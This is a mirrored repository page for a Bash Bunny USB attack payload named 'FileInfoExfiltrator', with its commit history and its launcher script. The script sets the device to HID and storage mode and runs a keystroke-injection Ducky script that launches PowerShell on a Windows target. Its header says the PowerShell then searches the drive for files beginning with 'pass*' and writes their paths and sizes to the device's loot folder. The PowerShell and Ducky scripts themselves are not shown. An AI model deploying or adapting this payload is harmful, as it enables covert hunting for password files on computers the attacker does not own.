mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
6542907c6e
* Scan for files that contain a specific phrase and exfil info about them * Delete FileInfoExfil * Create FileInfoExfil * Delete FileInfoExfil * Scans system for files beginning with a specific phrase and exfils data from them * Delete ducky_script.txt * Delete p.bat * Delete payload.txt * Exfil file information to the loot folder Exfiltrates file information of files that contain a specific phrase, including if it is a directory, the file path and file size (in KB) to the loot folder of the BashBunny. * Delete p.ps1 * Add files via upload * Create readme.md * Delete readme.md * Create readme.md * Update payload.txt * Update readme.md
61 lines
1.3 KiB
Plaintext
61 lines
1.3 KiB
Plaintext
#Title: FileInfoExfiltrator
|
|
#Author: A_SarcasticGuy
|
|
#Version: 1.0
|
|
#Target: Windows
|
|
#
|
|
#Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided) for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*") to then #be outputted to a text file in the loot directory, in a subfolder with the name of the system and with a #file name of the date and time of the scan.
|
|
#
|
|
# Options: Search Directory: Find in p.bat (default c:/)
|
|
# Search criteria: Find in p.bat (default "pass*")
|
|
#
|
|
# Purple LED..................Script Started
|
|
# Yellow LED..................Ducky Script Started
|
|
# Red LED.....................Failed to run Ducky Script, see log file
|
|
#
|
|
# NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
|
|
#
|
|
|
|
LED B R
|
|
|
|
ATTACKMODE HID STORAGE
|
|
|
|
|
|
|
|
# Set language
|
|
QUACK SET_LANGUAGE gb
|
|
|
|
|
|
# Source bunny_helpers.sh to allow the value fo SWITCH_POSITION to be returned
|
|
source bunny_helpers.sh
|
|
|
|
|
|
|
|
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
|
|
|
|
|
|
#Call ducky script
|
|
LED R G
|
|
|
|
|
|
QUACK ${SWITCH_POSITION}/ducky_script.txt
|
|
|
|
|
|
QUACK DELAY 10000
|
|
|
|
LED R G B
|
|
|
|
else
|
|
|
|
|
|
LED R
|
|
|
|
|
|
#Red LED if unable to load script
|
|
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
|
|
|
|
|
|
exit 1
|
|
|
|
|
|
fi
|